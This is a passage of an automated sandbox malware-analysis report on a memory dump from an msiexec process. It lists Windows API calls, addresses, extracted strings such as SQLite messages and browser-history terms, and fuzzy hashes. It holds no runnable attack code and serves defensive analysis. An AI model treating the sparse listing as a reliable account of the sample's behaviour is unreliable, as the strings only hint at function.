                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFilefreememset
                                                                                              • String ID:
                                                                                              • API String ID: 2507021081-0
                                                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                              • free.MSVCRT ref: 00417544
                                                                                              • free.MSVCRT ref: 00417562
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 4131324427-0
                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                              • free.MSVCRT ref: 0041822B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PathTemp$free
                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                              • API String ID: 924794160-1420421710
                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 1775345501-2769808009
                                                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 313946961-1552265934
                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                              • API String ID: 0-1953309616
                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                              APIs
                                                                                              Strings
                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                              • API String ID: 3510742995-272990098
                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                              APIs
                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1265369119-0
                                                                                              • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                              • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: gj
                                                                                              • API String ID: 1297977491-4203073231
                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                              APIs
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$free
                                                                                              • String ID:
                                                                                              • API String ID: 2241099983-0
                                                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                              • free.MSVCRT ref: 004174E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 4053608372-0
                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1471605966-0
                                                                                              • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                              • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                              APIs
                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                              • String ID: \StringFileInfo\
                                                                                              • API String ID: 102104167-2245444037
                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memicmpwcslen
                                                                                              • String ID: @@@@$History
                                                                                              • API String ID: 1872909662-685208920
                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3400436232-259020660
                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                              • String ID: caption
                                                                                              • API String ID: 1523050162-4135340389
                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                              APIs
                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 210187428-168460110
                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 2747424523-2167791130
                                                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                              • API String ID: 3150196962-1506664499
                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
